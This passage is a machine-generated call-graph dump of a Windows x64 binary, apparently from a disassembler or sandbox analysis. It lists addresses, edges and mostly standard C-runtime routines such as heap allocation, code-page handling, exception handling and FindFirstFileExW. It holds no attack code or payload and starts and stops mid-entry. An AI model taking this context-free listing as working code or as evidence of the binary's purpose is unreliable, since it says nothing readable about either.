7ff7ea029b14 6275->6278 6323 7ff7ea02940c 6275->6323 6279 7ff7ea0286b8 __free_lconv_num 11 API calls 6276->6279 6277 7ff7ea029a6c 6277->6275 6280 7ff7ea0286b8 __free_lconv_num 11 API calls 6277->6280 6282 7ff7ea0286b8 __free_lconv_num 11 API calls 6278->6282 6279->6265 6280->6275 6282->6265 6284 7ff7ea029b6f 6283->6284 6285 7ff7ea029b79 6284->6285 6338 7ff7ea02847c EnterCriticalSection 6284->6338 6287 7ff7ea029beb 6285->6287 6290 7ff7ea027b60 __GetCurrentState 47 API calls 6285->6290 6287->6262 6291 7ff7ea029c03 6290->6291 6293 7ff7ea029c56 6291->6293 6295 7ff7ea0281a8 52 API calls 6291->6295 6293->6262 6296 7ff7ea029c40 6295->6296 6297 7ff7ea0298dc 67 API calls 6296->6297 6297->6293 6339 7ff7ea029128 6298->6339 6301 7ff7ea02960e 6303 7ff7ea029613 GetACP 6301->6303 6304 7ff7ea029623 6301->6304 6302 7ff7ea0295fc GetOEMCP 6302->6304 6303->6304 6304->6265 6305 7ff7ea0284ec 6304->6305 6306 7ff7ea028537 6305->6306 6310 7ff7ea0284fb _set_fmode 6305->6310 6307 7ff7ea028620 _set_fmode 11 API calls 6306->6307 6309 7ff7ea028535 6307->6309 6308 7ff7ea02851e HeapAlloc 6308->6309 6308->6310 6309->6267 6310->6306 6310->6308 6311 7ff7ea02675c _set_fmode 2 API calls 6310->6311 6311->6310 6313 7ff7ea0295dc 49 API calls 6312->6313 6314 7ff7ea029cad 6313->6314 6315 7ff7ea029e03 6314->6315 6317 7ff7ea029cea IsValidCodePage 6314->6317 6322 7ff7ea029d04 __scrt_get_show_window_mode 6314->6322 6316 7ff7ea021e60 _log10_special 8 API calls 6315->6316 6318 7ff7ea029a49 6316->6318 6317->6315 6319 7ff7ea029cfb 6317->6319 6318->6273 6318->6277 6320 7ff7ea029d2a GetCPInfo 6319->6320 6319->6322 6320->6315 6320->6322 6371 7ff7ea0296f4 6322->6371 6458 7ff7ea02847c EnterCriticalSection 6323->6458 6340 7ff7ea029147 6339->6340 6341 7ff7ea02914c 6339->6341 6340->6301 6340->6302 6341->6340 6342 7ff7ea0280d4 __GetCurrentState 47 API calls 6341->6342 6343 7ff7ea029167 6342->6343 6347 7ff7ea02bf00 6343->6347 6348 7ff7ea02918a 6347->6348 6349 7ff7ea02bf15 6347->6349 6351 7ff7ea02bf6c 6348->6351 6349->6348 6355 7ff7ea02b000 6349->6355 6352 7ff7ea02bf94 6351->6352 6353 7ff7ea02bf81 6351->6353 6352->6340 6353->6352 6368 7ff7ea029c64 6353->6368 6356 7ff7ea0280d4 __GetCurrentState 47 API calls 6355->6356 6357 7ff7ea02b00f 6356->6357 6358 7ff7ea02b05a 6357->6358 6367 7ff7ea02847c EnterCriticalSection 6357->6367 6358->6348 6369 7ff7ea0280d4 __GetCurrentState 47 API calls 6368->6369 6370 7ff7ea029c6d 6369->6370 6372 7ff7ea029731 GetCPInfo 6371->6372 6373 7ff7ea029827 6371->6373 6372->6373 6378 7ff7ea029744 6372->6378 6374 7ff7ea021e60 _log10_special 8 API calls 6373->6374 6376 7ff7ea0298c6 6374->6376 6376->6315 6382 7ff7ea02ab3c 6378->6382 6383 7ff7ea029128 47 API calls 6382->6383 6384 7ff7ea02ab7e 6383->6384 6402 7ff7ea029ff0 6384->6402 6403 7ff7ea029ff9 MultiByteToWideChar 6402->6403 6460 7ff7ea021a70 6459->6460 6463 7ff7ea02195f 6459->6463 6521 7ff7ea0211a0 6460->6521 6464 7ff7ea0219b0 6463->6464 6465 7ff7ea021a04 6463->6465 6467 7ff7ea0219d2 6463->6467 6466 7ff7ea021a6a 6464->6466 6506 7ff7ea021e80 6464->6506 6465->6467 6470 7ff7ea021e80 51 API calls 6465->6470 6515 7ff7ea021100 6466->6515 6467->6146 6470->6467 6472 7ff7ea0266dc _invalid_parameter_noinfo_noreturn 47 API calls 6472->6466 6474 7ff7ea021ba1 6473->6474 6479 7ff7ea021aa1 6473->6479 6475 7ff7ea0211a0 51 API calls 6474->6475 6477 7ff7ea021ba7 6475->6477 6476 7ff7ea021af3 6478 7ff7ea021b9b 6476->6478 6482 7ff7ea021e80 51 API calls 6476->6482 6480 7ff7ea021100 Concurrency::cancel_current_task 51 API calls 6478->6480 6479->6476 6479->6478 6481 7ff7ea021b58 6479->6481 6483 7ff7ea0212b4 MultiByteToWideChar LoadLibraryExW 6479->6483 6480->6474 6481->6483 6485 7ff7ea021e80 51 API calls 6481->6485 6484 7ff7ea021b42 6482->6484 6483->6149 6484->6483 6486 7ff7ea0266dc _invalid_parameter_noinfo_noreturn 47 API calls 6484->6486 6485->6483 6486->6478 6488 7ff7ea021d36 6487->6488 6489 7ff7ea021bde 6487->6489 6490 7ff7ea0211a0 51 API calls 6488->6490 6491 7ff7ea021c31 6489->6491 6494 7ff7ea021c6a 6489->6494 6492 7ff7ea021d3c 6490->6492 6493 7ff7ea021e80 51 API calls 6491->6493 6495 7ff7ea021d30 6491->6495 6499 7ff7ea021c53 6493->6499 6496 7ff7ea021e80 51 API calls 6494->6496 6494->6499 6497 7ff7ea021100 Concurrency::cancel_current_task 51 API calls 6495->6497 6496->6499 6497->6488 6498 7ff7ea0266dc _invalid_parameter_noinfo_noreturn 47 API calls 6498->6495 6499->6498 6500 7ff7ea021cde 6499->6500 6500->6151 6502 7ff7ea026554 _invalid_parameter_noinfo 47 API calls 6501->6502 6503 7ff7ea0266f5 6502->6503 6504 7ff7ea02670c _invalid_parameter_noinfo_noreturn 17 API calls 6503->6504 6505 7ff7ea02670a 6504->6505 6507 7ff7ea021e8b 6506->6507 6508 7ff7ea0219c9 6507->6508 6509 7ff7ea02675c _set_fmode 2 API calls 6507->6509 6510 7ff7ea021eaa 6507->6510 6508->6467 6508->6472 6509->6507 6511 7ff7ea021eb5 6510->6511 6524 7ff7ea0223f8 6510->6524 6513 7ff7ea021100 Concurrency::cancel_current_task 51 API calls 6511->6513 6514 7ff7ea021ebb 6513->6514 6516 7ff7ea02110e Concurrency::cancel_current_task 6515->6516 6517 7ff7ea0233ec std::_Xinvalid_argument 2 API calls 6516->6517 6518 7ff7ea02111f 6517->6518 6533 7ff7ea0231d0 6518->6533 6555 7ff7ea021e20 6521->6555 6525 7ff7ea022406 std::bad_alloc::bad_alloc 6524->6525 6528 7ff7ea0233ec 6525->6528 6527 7ff7ea022417 6529 7ff7ea02340b 6528->6529 6530 7ff7ea023434 RtlPcToFileHeader 6529->6530 6531 7ff7ea023456 RaiseException 6529->6531 6532 7ff7ea02344c 6530->6532 6531->6527 6532->6531 6534 7ff7ea0231f1 6533->6534 6538 7ff7ea021149 6533->6538 6537 7ff7ea023226 6534->6537 6534->6538 6539 7ff7ea027bb8 6534->6539 6548 7ff7ea02759c 6537->6548 6538->6460 6540 7ff7ea027bcf 6539->6540 6541 7ff7ea027bc5 6539->6541 6542 7ff7ea028620 _set_fmode 11 API calls 6540->6542 6541->6540 6546 7ff7ea027bea 6541->6546 6543 7ff7ea027bd6 6542->6543 6544 7ff7ea0266bc _invalid_parameter_noinfo 47 API calls 6543->6544 6545 7ff7ea027be2 6544->6545 6545->6537 6546->6545 6547 7ff7ea028620 _set_fmode 11 API calls 6546->6547 6547->6543 6549 7ff7ea0286b8 6548->6549 6550 7ff7ea0286bd HeapFree 6549->6550 6552 7ff7ea0286ee 6549->6552 6551 7ff7ea0286d8 GetLastError 6550->6551 6550->6552 6553 7ff7ea0286e5 __free_lconv_num 6551->6553 6552->6538 6554 7ff7ea028620 _set_fmode 11 API calls 6553->6554 6554->6552 6560 7ff7ea021d9c 6555->6560 6558 7ff7ea0233ec std::_Xinvalid_argument 2 API calls 6559 7ff7ea021e42 6558->6559 6561 7ff7ea0231d0 __std_exception_copy 49 API calls 6560->6561 6562 7ff7ea021dd0 6561->6562 6562->6558 6615 7ff7ea027f54 6616 7ff7ea027f59 6615->6616 6617 7ff7ea027f6e 6615->6617 6621 7ff7ea027f74 6616->6621 6622 7ff7ea027fbe 6621->6622 6623 7ff7ea027fb6 6621->6623 6625 7ff7ea0286b8 __free_lconv_num 11 API calls 6622->6625 6624 7ff7ea0286b8 __free_lconv_num 11 API calls 6623->6624 6624->6622 6626 7ff7ea027fcb 6625->6626 6627 7ff7ea0286b8 __free_lconv_num 11 API calls 6626->6627 6628 7ff7ea027fd8 6627->6628 6629 7ff7ea0286b8 __free_lconv_num 11 API calls 6628->6629 6630 7ff7ea027fe5 6629->6630 6631 7ff7ea0286b8 __free_lconv_num 11 API calls 6630->6631 6632 7ff7ea027ff2 6631->6632 6633 7ff7ea0286b8 __free_lconv_num 11 API calls 6632->6633 6634 7ff7ea027fff 6633->6634 6635 7ff7ea0286b8 __free_lconv_num 11 API calls 6634->6635 6636 7ff7ea02800c 6635->6636 6637 7ff7ea0286b8 __free_lconv_num 11 API calls 6636->6637 6638 7ff7ea028019 6637->6638 6639 7ff7ea0286b8 __free_lconv_num 11 API calls 6638->6639 6640 7ff7ea028029 6639->6640 6641 7ff7ea0286b8 __free_lconv_num 11 API calls 6640->6641 6642 7ff7ea028039 6641->6642 6647 7ff7ea027e24 6642->6647 6661 7ff7ea02847c EnterCriticalSection 6647->6661 7271 7ff7ea026253 7272 7ff7ea0262d8 7271->7272 7273 7ff7ea026323 7272->7273 7274 7ff7ea0262e3 GetLastError 7272->7274 7275 7ff7ea0262f3 7274->7275 7276 7ff7ea028314 _invalid_parameter_noinfo 16 API calls 7275->7276 7277 7ff7ea02630e SetLastError 7276->7277 7277->7273 7278 7ff7ea026331 7277->7278 7279 7ff7ea027b60 __GetCurrentState 47 API calls 7278->7279 7280 7ff7ea026336 7279->7280 7068 7ff7ea0283d4 7069 7ff7ea0283e4 7068->7069 7070 7ff7ea02824c _set_fmode 11 API calls 7069->7070 7071 7ff7ea0283ef __vcrt_uninitialize_ptd 7069->7071 7070->7071 7072 7ff7ea021fb8 7079 7ff7ea022968 SetUnhandledExceptionFilter 7072->7079 6663 7ff7ea02493e 6664 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6663->6664 6666 7ff7ea02494b __CxxCallCatchBlock 6664->6666 6665 7ff7ea02498f RaiseException 6667 7ff7ea0249b6 6665->6667 6666->6665 6676 7ff7ea02309c 6667->6676 6669 7ff7ea0249e7 __CxxCallCatchBlock 6670 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6669->6670 6671 7ff7ea0249fa 6670->6671 6673 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6671->6673 6674 7ff7ea024a03 6673->6674 6677 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6676->6677 6678 7ff7ea0230ae 6677->6678 6679 7ff7ea0230e9 6678->6679 6680 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6678->6680 6681 7ff7ea027b60 __GetCurrentState 47 API calls 6679->6681 6684 7ff7ea0230b9 6680->6684 6682 7ff7ea0230ee 6681->6682 6683 7ff7ea0230d5 6685 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6683->6685 6684->6679 6684->6683 6686 7ff7ea0230da 6685->6686 6686->6669 6687 7ff7ea0232fc 6686->6687 6688 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6687->6688 6689 7ff7ea02330a 6688->6689 6689->6669 7281 7ff7ea024844 7282 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7281->7282 7283 7ff7ea024879 7282->7283 7284 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7283->7284 7285 7ff7ea024887 __except_validate_context_record 7284->7285 7286 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7285->7286 7287 7ff7ea0248cb 7286->7287 7288 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7287->7288 7289 7ff7ea0248d4 7288->7289 7290 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7289->7290 7291 7ff7ea0248dd 7290->7291 7304 7ff7ea023060 7291->7304 7294 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7295 7ff7ea02490d __CxxCallCatchBlock 7294->7295 7296 7ff7ea02309c __CxxCallCatchBlock 58 API calls 7295->7296 7300 7ff7ea0249be 7296->7300 7297 7ff7ea0249e7 __CxxCallCatchBlock 7298 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7297->7298 7299 7ff7ea0249fa 7298->7299 7301 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7299->7301 7300->7297 7303 7ff7ea0232fc __CxxCallCatchBlock 58 API calls 7300->7303 7302 7ff7ea024a03 7301->7302 7303->7297 7305 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7304->7305 7306 7ff7ea023071 7305->7306 7307 7ff7ea02307c 7306->7307 7308 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7306->7308 7309 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7307->7309 7308->7307 7310 7ff7ea02308d 7309->7310 7310->7294 7310->7295 7478 7ff7ea0274c4 7481 7ff7ea027448 7478->7481 7488 7ff7ea02847c EnterCriticalSection 7481->7488 7311 7ff7ea030644 7312 7ff7ea02309c __CxxCallCatchBlock 58 API calls 7311->7312 7316 7ff7ea030657 7312->7316 7313 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7314 7ff7ea0306aa 7313->7314 7315 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7314->7315 7318 7ff7ea0306ba 7315->7318 7317 7ff7ea0232fc __CxxCallCatchBlock 58 API calls 7316->7317 7319 7ff7ea030696 __CxxCallCatchBlock 7316->7319 7317->7319 7319->7313 7320 7ff7ea02ec68 7321 7ff7ea02ec79 CloseHandle 7320->7321 7322 7ff7ea02ec7f 7320->7322 7321->7322 7489 7ff7ea02cae8 7490 7ff7ea02caf0 7489->7490 7491 7ff7ea02cb05 7490->7491 7492 7ff7ea02cb1e 7490->7492 7493 7ff7ea028620 _set_fmode 11 API calls 7491->7493 7496 7ff7ea029128 47 API calls 7492->7496 7497 7ff7ea02cb15 7492->7497 7494 7ff7ea02cb0a 7493->7494 7495 7ff7ea0266bc _invalid_parameter_noinfo 47 API calls 7494->7495 7495->7497 7496->7497 6690 7ff7ea02bd6c 6691 7ff7ea02bd96 6690->6691 6692 7ff7ea028640 _set_fmode 11 API calls 6691->6692 6693 7ff7ea02bdb5 6692->6693 6694 7ff7ea0286b8 __free_lconv_num 11 API calls 6693->6694 6695 7ff7ea02bdc3 6694->6695 6696 7ff7ea028640 _set_fmode 11 API calls 6695->6696 6699 7ff7ea02bded 6695->6699 6698 7ff7ea02bddf 6696->6698 6700 7ff7ea0286b8 __free_lconv_num 11 API calls 6698->6700 6701 7ff7ea02bdf6 6699->6701 6702 7ff7ea02b350 6699->6702 6700->6699 6703 7ff7ea02b0d8 5 API calls 6702->6703 6704 7ff7ea02b386 6703->6704 6705 7ff7ea02b38b 6704->6705 6706 7ff7ea02b3a5 InitializeCriticalSectionAndSpinCount 6704->6706 6705->6699 6706->6705 7498 7ff7ea021ef0 7499 7ff7ea021f00 7498->7499 7515 7ff7ea027408 7499->7515 7501 7ff7ea021f0c 7521 7ff7ea022498 7501->7521 7503 7ff7ea022788 7 API calls 7505 7ff7ea021fa5 7503->7505 7504 7ff7ea021f24 _RTC_Initialize 7513 7ff7ea021f79 7504->7513 7526 7ff7ea022648 7504->7526 7507 7ff7ea021f39 7529 7ff7ea026c24 7507->7529 7513->7503 7514 7ff7ea021f95 7513->7514 7516 7ff7ea027419 7515->7516 7517 7ff7ea028620 _set_fmode 11 API calls 7516->7517 7518 7ff7ea027421 7516->7518 7519 7ff7ea027430 7517->7519 7518->7501 7520 7ff7ea0266bc _invalid_parameter_noinfo 47 API calls 7519->7520 7520->7518 7522 7ff7ea0224a9 7521->7522 7525 7ff7ea0224ae __scrt_acquire_startup_lock 7521->7525 7523 7ff7ea022788 7 API calls 7522->7523 7522->7525 7524 7ff7ea022522 7523->7524 7525->7504 7561 7ff7ea02260c 7526->7561 7528 7ff7ea022651 7528->7507 7530 7ff7ea021f45 7529->7530 7531 7ff7ea026c44 7529->7531 7530->7513 7560 7ff7ea022720 InitializeSListHead 7530->7560 7532 7ff7ea026c4c 7531->7532 7533 7ff7ea026c62 7531->7533 7534 7ff7ea028620 _set_fmode 11 API calls 7532->7534 7535 7ff7ea029c04 67 API calls 7533->7535 7536 7ff7ea026c51 7534->7536 7537 7ff7ea026c67 7535->7537 7538 7ff7ea0266bc _invalid_parameter_noinfo 47 API calls 7536->7538 7576 7ff7ea0292e8 GetModuleFileNameW 7537->7576 7538->7530 7543 7ff7ea026bc4 11 API calls 7544 7ff7ea026cd1 7543->7544 7545 7ff7ea026cd9 7544->7545 7546 7ff7ea026cf1 7544->7546 7547 7ff7ea028620 _set_fmode 11 API calls 7545->7547 7548 7ff7ea0269fc 47 API calls 7546->7548 7549 7ff7ea026cde 7547->7549 7552 7ff7ea026d0d 7548->7552 7550 7ff7ea0286b8 __free_lconv_num 11 API calls 7549->7550 7550->7530 7551 7ff7ea026d13 7553 7ff7ea0286b8 __free_lconv_num 11 API calls 7551->7553 7552->7551 7554 7ff7ea026d58 7552->7554 7555 7ff7ea026d3f 7552->7555 7553->7530 7558 7ff7ea0286b8 __free_lconv_num 11 API calls 7554->7558 7556 7ff7ea0286b8 __free_lconv_num 11 API calls 7555->7556 7557 7ff7ea026d48 7556->7557 7559 7ff7ea0286b8 __free_lconv_num 11 API calls 7557->7559 7558->7551 7559->7530 7562 7ff7ea022626 7561->7562 7564 7ff7ea02261f 7561->7564 7565 7ff7ea027974 7562->7565 7564->7528 7568 7ff7ea0275b0 7565->7568 7575 7ff7ea02847c EnterCriticalSection 7568->7575 7577 7ff7ea02932d GetLastError 7576->7577 7578 7ff7ea029341 7576->7578 7579 7ff7ea028594 11 API calls 7577->7579 7580 7ff7ea029128 47 API calls 7578->7580 7581 7ff7ea02933a 7579->7581 7582 7ff7ea02936f 7580->7582 7583 7ff7ea021e60 _log10_special 8 API calls 7581->7583 7584 7ff7ea02b2ec 5 API calls 7582->7584 7587 7ff7ea029380 7582->7587 7586 7ff7ea026c7e 7583->7586 7584->7587 7588 7ff7ea0269fc 7586->7588 7594 7ff7ea0291cc 7587->7594 7590 7ff7ea026a3a 7588->7590 7589 7ff7ea029fb4 47 API calls 7589->7590 7590->7589 7592 7ff7ea026aa6 7590->7592 7591 7ff7ea026b97 7591->7543 7592->7591 7593 7ff7ea029fb4 47 API calls 7592->7593 7593->7592 7595 7ff7ea02920b 7594->7595 7596 7ff7ea0291f0 7594->7596 7597 7ff7ea029210 7595->7597 7598 7ff7ea02a080 WideCharToMultiByte 7595->7598 7596->7581 7597->7596 7600 7ff7ea028620 _set_fmode 11 API calls 7597->7600 7599 7ff7ea029267 7598->7599 7599->7597 7601 7ff7ea02926e GetLastError 7599->7601 7602 7ff7ea029299 7599->7602 7600->7596 7603 7ff7ea028594 11 API calls 7601->7603 7605 7ff7ea02a080 WideCharToMultiByte 7602->7605 7604 7ff7ea02927b 7603->7604 7606 7ff7ea028620 _set_fmode 11 API calls 7604->7606 7607 7ff7ea0292c0 7605->7607 7606->7596 7607->7596 7607->7601 5872 7ff7ea0271f1 5884 7ff7ea027b34 5872->5884 5874 7ff7ea0271f6 5875 7ff7ea027267 5874->5875 5876 7ff7ea02721d GetModuleHandleW 5874->5876 5877 7ff7ea0270f4 11 API calls 5875->5877 5876->5875 5882 7ff7ea02722a 5876->5882 5878 7ff7ea0272a3 5877->5878 5879 7ff7ea0272aa 5878->5879 5880 7ff7ea0272c0 11 API calls 5878->5880 5881 7ff7ea0272bc 5880->5881 5882->5875 5883 7ff7ea027318 GetModuleHandleExW GetProcAddress FreeLibrary 5882->5883 5883->5875 5889 7ff7ea0280d4 GetLastError 5884->5889 5890 7ff7ea0280f8 FlsGetValue 5889->5890 5891 7ff7ea028115 FlsSetValue 5889->5891 5892 7ff7ea02810f 5890->5892 5908 7ff7ea028105 SetLastError 5890->5908 5893 7ff7ea028127 5891->5893 5891->5908 5892->5891 5927 7ff7ea028640 5893->5927 5897 7ff7ea027b3d 5911 7ff7ea027b60 5897->5911 5898 7ff7ea0281a1 5901 7ff7ea027b60 __GetCurrentState 40 API calls 5898->5901 5899 7ff7ea028154 FlsSetValue 5903 7ff7ea028172 5899->5903 5904 7ff7ea028160 FlsSetValue 5899->5904 5900 7ff7ea028144 FlsSetValue 5902 7ff7ea02814d 5900->5902 5905 7ff7ea0281a6 5901->5905 5934 7ff7ea0286b8 5902->5934 5940 7ff7ea027e84 5903->5940 5904->5902 5908->5897 5908->5898 5988 7ff7ea02b758 5911->5988 5932 7ff7ea028651 _set_fmode 5927->5932 5928 7ff7ea0286a2 5948 7ff7ea028620 5928->5948 5929 7ff7ea028686 HeapAlloc 5930 7ff7ea028136 5929->5930 5929->5932 5930->5899 5930->5900 5932->5928 5932->5929 5945 7ff7ea02675c 5932->5945 5935 7ff7ea0286bd HeapFree 5934->5935 5936 7ff7ea0286ee 5934->5936 5935->5936 5937 7ff7ea0286d8 GetLastError 5935->5937 5936->5908 5938 7ff7ea0286e5 __free_lconv_num 5937->5938 5939 7ff7ea028620 _set_fmode 9 API calls 5938->5939 5939->5936 5974 7ff7ea027d5c 5940->5974 5951 7ff7ea02679c 5945->5951 5957 7ff7ea02824c GetLastError 5948->5957 5950 7ff7ea028629 5950->5930 5956 7ff7ea02847c EnterCriticalSection 5951->5956 5958 7ff7ea02828d FlsSetValue 5957->5958 5959 7ff7ea028270 5957->5959 5960 7ff7ea02829f 5958->5960 5964 7ff7ea02827d 5958->5964 5959->5958 5959->5964 5961 7ff7ea028640 _set_fmode 5 API calls 5960->5961 5963 7ff7ea0282ae 5961->5963 5962 7ff7ea0282f9 SetLastError 5962->5950 5965 7ff7ea0282cc FlsSetValue 5963->5965 5966 7ff7ea0282bc FlsSetValue 5963->5966 5964->5962 5968 7ff7ea0282ea 5965->5968 5969 7ff7ea0282d8 FlsSetValue 5965->5969 5967 7ff7ea0282c5 5966->5967 5970 7ff7ea0286b8 __free_lconv_num 5 API calls 5967->5970 5971 7ff7ea027e84 _set_fmode 5 API calls 5968->5971 5969->5967 5970->5964 5972 7ff7ea0282f2 5971->5972 5973 7ff7ea0286b8 __free_lconv_num 5 API calls 5972->5973 5973->5962 5986 7ff7ea02847c EnterCriticalSection 5974->5986 6025 7ff7ea02b710 5988->6025 6030 7ff7ea02847c EnterCriticalSection 6025->6030 7083 7ff7ea0279f4 7086 7ff7ea026fac 7083->7086 7093 7ff7ea026f74 7086->7093 7091 7ff7ea026f30 11 API calls 7092 7ff7ea026fdf 7091->7092 7094 7ff7ea026f89 7093->7094 7095 7ff7ea026f84 7093->7095 7097 7ff7ea026f90 7094->7097 7096 7ff7ea026f30 11 API calls 7095->7096 7096->7094 7098 7ff7ea026fa0 7097->7098 7099 7ff7ea026fa5 7097->7099 7100 7ff7ea026f30 11 API calls 7098->7100 7099->7091 7100->7099 7101 7ff7ea0233e0 7102 7ff7ea027b34 47 API calls 7101->7102 7103 7ff7ea0233e9 7102->7103 7323 7ff7ea021060 7326 7ff7ea023260 7323->7326 7325 7ff7ea021082 7327 7ff7ea023277 7326->7327 7328 7ff7ea02326f 7326->7328 7327->7325 7329 7ff7ea02759c __std_exception_copy 13 API calls 7328->7329 7329->7327 7104 7ff7ea0307df 7105 7ff7ea0307f8 7104->7105 7106 7ff7ea0307ee 7104->7106 7108 7ff7ea0284d0 LeaveCriticalSection 7106->7108 7608 7ff7ea0306e0 7609 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7608->7609 7610 7ff7ea0306ee 7609->7610 7611 7ff7ea0306f9 7610->7611 7612 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7610->7612 7612->7611 7613 7ff7ea0304e6 7614 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7613->7614 7615 7ff7ea0304fe 7614->7615 7616 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7615->7616 7617 7ff7ea030519 7616->7617 7618 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7617->7618 7619 7ff7ea03052d 7618->7619 7620 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7619->7620 7621 7ff7ea03056f 7620->7621 6713 7ff7ea030589 6714 7ff7ea0305a1 6713->6714 6720 7ff7ea03060c 6713->6720 6715 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6714->6715 6714->6720 6716 7ff7ea0305ee 6715->6716 6717 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6716->6717 6718 7ff7ea030603 6717->6718 6719 7ff7ea027b34 47 API calls 6718->6719 6719->6720 7330 7ff7ea027a8c 7331 7ff7ea0286b8 __free_lconv_num 11 API calls 7330->7331 7332 7ff7ea027a9c 7331->7332 7333 7ff7ea0286b8 __free_lconv_num 11 API calls 7332->7333 7334 7ff7ea027ab0 7333->7334 7335 7ff7ea0286b8 __free_lconv_num 11 API calls 7334->7335 7336 7ff7ea027ac4 7335->7336 7337 7ff7ea0286b8 __free_lconv_num 11 API calls 7336->7337 7338 7ff7ea027ad8 7337->7338 7112 7ff7ea02b60c GetProcessHeap 7339 7ff7ea02be8c 7340 7ff7ea02be97 7339->7340 7348 7ff7ea02de60 7340->7348 7361 7ff7ea02847c EnterCriticalSection 7348->7361 7113 7ff7ea028a10 7114 7ff7ea028a35 7113->7114 7124 7ff7ea028a4c 7113->7124 7115 7ff7ea028620 _set_fmode 11 API calls 7114->7115 7116 7ff7ea028a3a 7115->7116 7118 7ff7ea0266bc _invalid_parameter_noinfo 47 API calls 7116->7118 7117 7ff7ea028b04 7167 7ff7ea026bc4 7117->7167 7120 7ff7ea028a45 7118->7120 7123 7ff7ea028b64 7126 7ff7ea0286b8 __free_lconv_num 11 API calls 7123->7126 7124->7117 7127 7ff7ea028a99 7124->7127 7129 7ff7ea028adc 7124->7129 7145 7ff7ea028c54 7124->7145 7125 7ff7ea028bf5 7130 7ff7ea0286b8 __free_lconv_num 11 API calls 7125->7130 7128 7ff7ea028b6b 7126->7128 7131 7ff7ea028abc 7127->7131 7135 7ff7ea0286b8 __free_lconv_num 11 API calls 7127->7135 7128->7131 7136 7ff7ea0286b8 __free_lconv_num 11 API calls 7128->7136 7129->7131 7137 7ff7ea0286b8 __free_lconv_num 11 API calls 7129->7137 7133 7ff7ea028c00 7130->7133 7134 7ff7ea0286b8 __free_lconv_num 11 API calls 7131->7134 7132 7ff7ea028b96 7132->7125 7132->7132 7142 7ff7ea028c3b 7132->7142 7173 7ff7ea02c590 7132->7173 7138 7ff7ea028c19 7133->7138 7141 7ff7ea0286b8 __free_lconv_num 11 API calls 7133->7141 7134->7120 7135->7127 7136->7128 7137->7129 7139 7ff7ea0286b8 __free_lconv_num 11 API calls 7138->7139 7139->7120 7141->7133 7143 7ff7ea02670c _invalid_parameter_noinfo_noreturn 17 API calls 7142->7143 7144 7ff7ea028c50 7143->7144 7146 7ff7ea028c82 7145->7146 7146->7146 7147 7ff7ea028640 _set_fmode 11 API calls 7146->7147 7148 7ff7ea028ccd 7147->7148 7149 7ff7ea02c590 47 API calls 7148->7149 7150 7ff7ea028d03 7149->7150 7151 7ff7ea02670c _invalid_parameter_noinfo_noreturn 17 API calls 7150->7151 7152 7ff7ea028dd7 7151->7152 7153 7ff7ea029128 47 API calls 7152->7153 7154 7ff7ea028eba 7153->7154 7182 7ff7ea02b2ec 7154->7182 7159 7ff7ea028f81 7160 7ff7ea029128 47 API calls 7159->7160 7161 7ff7ea028fb1 7160->7161 7162 7ff7ea02b2ec 5 API calls 7161->7162 7163 7ff7ea028fda 7162->7163 7207 7ff7ea028884 7163->7207 7166 7ff7ea028c54 57 API calls 7168 7ff7ea026c14 7167->7168 7169 7ff7ea026bdc 7167->7169 7168->7123 7168->7132 7169->7168 7170 7ff7ea028640 _set_fmode 11 API calls 7169->7170 7171 7ff7ea026c0a 7170->7171 7172 7ff7ea0286b8 __free_lconv_num 11 API calls 7171->7172 7172->7168 7174 7ff7ea02c5ad 7173->7174 7176 7ff7ea02c5c8 7174->7176 7178 7ff7ea02c5b2 7174->7178 7180 7ff7ea02c5fc 7174->7180 7175 7ff7ea028620 _set_fmode 11 API calls 7177 7ff7ea02c5bc 7175->7177 7176->7132 7179 7ff7ea0266bc _invalid_parameter_noinfo 47 API calls 7177->7179 7178->7175 7178->7176 7179->7176 7180->7176 7181 7ff7ea028620 _set_fmode 11 API calls 7180->7181 7181->7177 7183 7ff7ea02b0d8 5 API calls 7182->7183 7184 7ff7ea028ee5 7183->7184 7185 7ff7ea028708 7184->7185 7186 7ff7ea028732 7185->7186 7187 7ff7ea028756 7185->7187 7191 7ff7ea0286b8 __free_lconv_num 11 API calls 7186->7191 7194 7ff7ea028741 FindFirstFileExW 7186->7194 7188 7ff7ea02875b 7187->7188 7189 7ff7ea0287b0 7187->7189 7192 7ff7ea028770 7188->7192 7188->7194 7195 7ff7ea0286b8 __free_lconv_num 11 API calls 7188->7195 7190 7ff7ea029ff0 MultiByteToWideChar 7189->7190 7201 7ff7ea0287cc 7190->7201 7191->7194 7196 7ff7ea0284ec 12 API calls 7192->7196 7193 7ff7ea0287d3 GetLastError 7229 7ff7ea028594 7193->7229 7194->7159 7195->7192 7196->7194 7198 7ff7ea02880e 7198->7194 7199 7ff7ea029ff0 MultiByteToWideChar 7198->7199 7203 7ff7ea028852 7199->7203 7201->7193 7201->7198 7202 7ff7ea028801 7201->7202 7205 7ff7ea0286b8 __free_lconv_num 11 API calls 7201->7205 7206 7ff7ea0284ec 12 API calls 7202->7206 7203->7193 7203->7194 7204 7ff7ea028620 _set_fmode 11 API calls 7204->7194 7205->7202 7206->7198 7208 7ff7ea0288ae 7207->7208 7209 7ff7ea0288d2 7207->7209 7213 7ff7ea0286b8 __free_lconv_num 11 API calls 7208->7213 7216 7ff7ea0288bd 7208->7216 7210 